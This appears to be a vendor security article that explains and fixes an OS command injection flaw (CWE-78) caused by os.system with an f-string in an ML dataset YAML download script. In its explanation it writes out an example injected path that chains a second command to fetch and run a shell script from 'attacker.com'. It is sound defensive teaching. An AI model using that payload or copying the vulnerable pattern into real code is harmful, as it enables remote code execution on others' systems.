What is command injection in Python?

Command injection occurs when user-controlled data is embedded in a shell command string (e.g., via os.system() or subprocess with shell=True) without sanitization, allowing attackers to append shell metacharacters like `;`, `|`, or `&&` to execute arbitrary commands.

How do you prevent command injection in Python?

Avoid os.system() and shell=True entirely. Use Python's built-in filesystem functions like shutil.rmtree(), pathlib.Path.unlink(), or subprocess with a list of arguments (no shell=True) so the shell is never invoked.

What CWE is command injection?

Command injection is CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").

Is input validation enough to prevent command injection in Python?

Input validation (e.g., allowlisting characters) reduces risk but is fragile and error-prone. The safest approach is to eliminate the shell call entirely using native Python APIs like shutil, which makes injection structurally impossible regardless of input.

Can static analysis detect command injection in Python?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can detect patterns like os.system() with f-strings or string concatenation. Orbis AppSec's scanner flagged this exact pattern in xView.yaml automatically.

How command injection happens in Python os.system() and how to fix it

Summary

A critical command injection vulnerability was found in the data/xView.yaml dataset download script used by a machine learning pipeline. The culprit: a single line — os.system(f'rm -rf {labels}') — that handed a user-influenced filesystem path directly to the shell. An attacker who controls the YAML configuration file could inject shell metacharacters into the labels path and achieve arbitrary command execution on the host machine. The fix is clean and decisive: throw out the shell call entirely and use Python's native filesystem APIs instead.

Introduction

The data/xView.yaml file defines how the xView aerial imagery dataset is downloaded and prepared for training. Buried inside its embedded Python download script, at line 102, was this line:

os.system(f'rm -rf {labels}')

The labels variable is a pathlib.Path object constructed from a base path that originates in the YAML configuration itself:

labels = Path(path / 'labels' / 'train')

Because path is derived from user-supplied or user-modifiable configuration, an attacker who can influence the YAML file can influence labels — and therefore influence the shell command that gets executed. This is the textbook definition of OS command injection (CWE-78), and it carries a critical severity rating because exploitation requires only the ability to supply a crafted dataset YAML file, which is a completely normal and expected operation when training on custom datasets.

The Vulnerability Explained

What went wrong

Python's os.system() passes its argument to the system shell (/bin/sh on Unix). When you use an f-string to build that argument, you're constructing a shell command string — and the shell will interpret every metacharacter in that string.

The vulnerable line:

os.system(f'rm -rf {labels}')

If labels evaluates to /path/to/project/labels/train, this becomes:

rm -rf /path/to/project/labels/train

Perfectly harmless. But if an attacker controls the base path and sets it to something like:

/tmp/labels; curl http://attacker.com/shell.sh | bash

The resulting shell command becomes:

rm -rf /tmp/labels; curl http://attacker.com/shell.sh | bash

The shell executes both commands. The ; metacharacter acts as a command separator, and the attacker's payload runs with the same privileges as the Python process.

Realistic attack scenarios

Scenario 1 — Malicious dataset distribution:
An attacker publishes a modified xView.yaml (or a custom dataset YAML that follows the same pattern) on a public repository or model hub. A researcher downloads it and runs the training pipeline. The download script executes, and the injected command runs silently alongside the legitimate rm -rf.

Scenario 2 — Supply chain attack:
In a CI/CD pipeline that automatically fetches dataset configurations, a compromised upstream YAML file triggers command execution on the build server, potentially exfiltrating secrets or installing backdoors.

Scenario 3 — Local privilege escalation:
In a shared compute environment (e.g., a university GPU cluster), a user places a crafted YAML in a shared directory. Another user with higher privileges runs training, and the injected command executes under their account.

Why f-strings make this worse

An f-string gives the appearance of clean, readable code — there's no obvious string concatenation that might trigger a code reviewer's instinct. But f'rm -rf {labels}' is functionally identical to 'rm -rf ' + str(labels) from the shell's perspective. Both produce a single string that the shell will parse and execute in full, metacharacters and all.

The Fix

The fix is elegant because it doesn't try to sanitize the input — it eliminates the shell entirely.

Before (vulnerable)

import os
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
os.system(f'rm -rf {labels}')
labels.mkdir(parents=True, exist_ok=True)

After (fixed)

import shutil
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
if labels.is_symlink() or labels.is_file():
    labels.unlink()
else:
    shutil.rmtree(labels, ignore_errors=True)
labels.mkdir(parents=True, exist_ok=True)

Why this fix works

1. No shell is ever invoked.
shutil.rmtree() and Path.unlink() are pure Python functions that make direct system calls. There is no shell process, no shell parsing, and therefore no opportunity for shell metacharacter injection. It doesn't matter what characters are in labels — they're treated as a literal filesystem path, not as a shell command string.

2. The import os is replaced with import shutil.
This is a meaningful signal: the fix doesn't just patch the dangerous call — it removes the dependency that enabled it. os.system() is no longer available in this script's namespace.

3. Symlink and file edge cases are handled explicitly.
The fix distinguishes between symlinks/files (labels.unlink()) and directories (shutil.rmtree()). The original rm -rf handled both implicitly via the shell. The explicit Python version is actually more correct and more readable.

4. ignore_errors=True preserves the original intent.
The original rm -rf silently succeeds even if the path doesn't exist. shutil.rmtree(labels, ignore_errors=True) matches that behavior without swallowing unexpected errors in a way that masks bugs.

Prevention & Best Practices

Never use `os.system()` with dynamic input

os.system() should be treated as a code smell in modern Python. It offers no argument separation, no output capture, and no protection against injection. The Python docs themselves recommend subprocess as a replacement — but even subprocess is dangerous with shell=True.

Pattern	Safe?	Notes
`os.system(f'rm -rf {path}')`	❌	Shell injection, no output capture
`subprocess.run(f'rm -rf {path}', shell=True)`	❌	Same shell injection risk
`subprocess.run(['rm', '-rf', str(path)])`	✅	No shell, args passed directly
`shutil.rmtree(path)`	✅	Best: no subprocess at all

Prefer native Python filesystem APIs

For filesystem operations, Python's standard library almost always has a safe equivalent:

# Instead of: os.system('rm -rf /some/path')
shutil.rmtree('/some/path', ignore_errors=True)

# Instead of: os.system('cp src dst')
shutil.copy2(src, dst)

# Instead of: os.system('mkdir -p /some/path')
Path('/some/path').mkdir(parents=True, exist_ok=True)

# Instead of: os.system('mv src dst')
Path(src).rename(dst)

Use `shlex.quote()` as a last resort

If you absolutely must pass a path to a shell command, use shlex.quote() to escape it:

import shlex
import subprocess

# If you truly cannot avoid a shell call:
safe_path = shlex.quote(str(labels))
subprocess.run(f'some-tool --input {safe_path}', shell=True, check=True)

shlex.quote() wraps the string in single quotes and escapes any internal single quotes, preventing shell interpretation. But this should be a last resort — the preferred solution is always to avoid the shell entirely.

Audit YAML-embedded scripts

Dataset configuration files that embed executable Python scripts (a pattern used by several ML frameworks) deserve special security scrutiny. Any path, URL, or string value that flows from YAML configuration into a shell command is a potential injection point. When reviewing such files, trace every variable that touches os.system(), subprocess, or eval().

Relevant standards

CWE-78: Improper Neutralization of Special Elements used in an OS Command
OWASP A03:2021: Injection — command injection is explicitly covered
OWASP Command Injection Defense Cheat Sheet: recommends avoiding shell calls and using language-native APIs

Key Takeaways

os.system() with an f-string is always dangerous when the interpolated value is user-influenced — in this case, the labels path in xView.yaml was directly derived from YAML configuration that any user can modify.
The labels variable in the download script was the taint source — it flowed from YAML path configuration into os.system() without any sanitization or quoting.
Replacing os.system() with shutil.rmtree() is not just a patch — it's a structural fix that makes injection impossible by design, regardless of what the path contains.
YAML files that embed executable scripts are an underappreciated attack surface in ML pipelines; every dynamic value that reaches a shell call must be treated as potentially attacker-controlled.
shutil.rmtree() with ignore_errors=True is a drop-in behavioral replacement for rm -rf that requires zero shell involvement and handles the symlink/file/directory distinction correctly.

How Orbis AppSec Detected This

Source: The path variable derived from YAML dataset configuration in data/xView.yaml, which flows into labels = Path(path / 'labels' / 'train')
Sink: os.system(f'rm -rf {labels}') at data/xView.yaml:102 — a shell-invoking function receiving an f-string built from the tainted labels variable
Missing control: No shell escaping (e.g., shlex.quote()), no input validation, and no use of shell-free filesystem APIs before the value reached os.system()
CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
Fix: Replaced os.system(f'rm -rf {labels}') with shutil.rmtree(labels, ignore_errors=True) and labels.unlink(), removing the shell invocation entirely

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

A single line — os.system(f'rm -rf {labels}') — was enough to introduce a critical command injection vulnerability into an ML dataset pipeline. The root cause isn't exotic: it's the combination of a shell-invoking function and an f-string built from user-influenced data, a pattern that appears frequently in data science and ML codebases where shell commands are used as quick shortcuts for filesystem operations.

The fix demonstrates the right mental model: when you need to delete a directory in Python, reach for shutil.rmtree(), not os.system('rm -rf ...'). The Python standard library has safe, shell-free equivalents for virtually every common filesystem operation. Using them doesn't just fix a vulnerability — it makes the entire class of shell injection attacks structurally impossible in that code path.

If you maintain ML pipelines that use YAML-embedded download scripts, this is a good moment to audit every call to os.system(), subprocess.run(..., shell=True), and eval() and ask: does any user-controlled value reach this call? If the answer is yes, the shell needs to go.

How command injection happens in Python os.system() and how to fix it

Answer Summary

Vulnerability at a Glance

How command injection happens in Python os.system() and how to fix it

Summary

Introduction

The Vulnerability Explained

What went wrong

Realistic attack scenarios

Why f-strings make this worse

The Fix

Before (vulnerable)

After (fixed)

Why this fix works

Prevention & Best Practices

Never use `os.system()` with dynamic input

Prefer native Python filesystem APIs

Use `shlex.quote()` as a last resort

Audit YAML-embedded scripts

Relevant standards

Key Takeaways

How Orbis AppSec Detected This

Conclusion

References

Frequently Asked Questions

What is command injection in Python?

How do you prevent command injection in Python?

What CWE is command injection?

Is input validation enough to prevent command injection in Python?

Can static analysis detect command injection in Python?

View the Security Fix

Related Articles

How command injection happens in Node.js child_process and how to fix it

How shell command injection happens in Python subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it

How command injection happens in Go ffmpeg-go and how to fix it

How command injection happens in Python os.popen() and how to fix it

How command injection happens in Node.js subprocess and how to fix it

cwe	CWE-78
fix	Replaced os.system() shell invocation with shutil.rmtree() and Path.unlink(), eliminating shell interpretation entirely
risk	Arbitrary command execution on the host machine when processing attacker-controlled YAML dataset configuration
language	Python
root cause	User-influenced path variable interpolated directly into an os.system() shell command via an f-string without sanitization
vulnerability	OS Command Injection via f-string in os.system()

How command injection happens in Python os.system() and how to fix it

Answer Summary

Vulnerability at a Glance

How command injection happens in Python os.system() and how to fix it

Summary

Introduction

The Vulnerability Explained

What went wrong

Realistic attack scenarios

Why f-strings make this worse

The Fix

Before (vulnerable)

After (fixed)

Why this fix works

Prevention & Best Practices

Never use os.system() with dynamic input

Prefer native Python filesystem APIs

Use shlex.quote() as a last resort

Audit YAML-embedded scripts

Relevant standards

Key Takeaways

How Orbis AppSec Detected This

Conclusion

References

Frequently Asked Questions

What is command injection in Python?

How do you prevent command injection in Python?

What CWE is command injection?

Is input validation enough to prevent command injection in Python?

Can static analysis detect command injection in Python?

View the Security Fix

Related Articles

How command injection happens in Node.js child_process and how to fix it

How shell command injection happens in Python subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it

How command injection happens in Go ffmpeg-go and how to fix it

How command injection happens in Python os.popen() and how to fix it

How command injection happens in Node.js subprocess and how to fix it

Never use `os.system()` with dynamic input

Use `shlex.quote()` as a last resort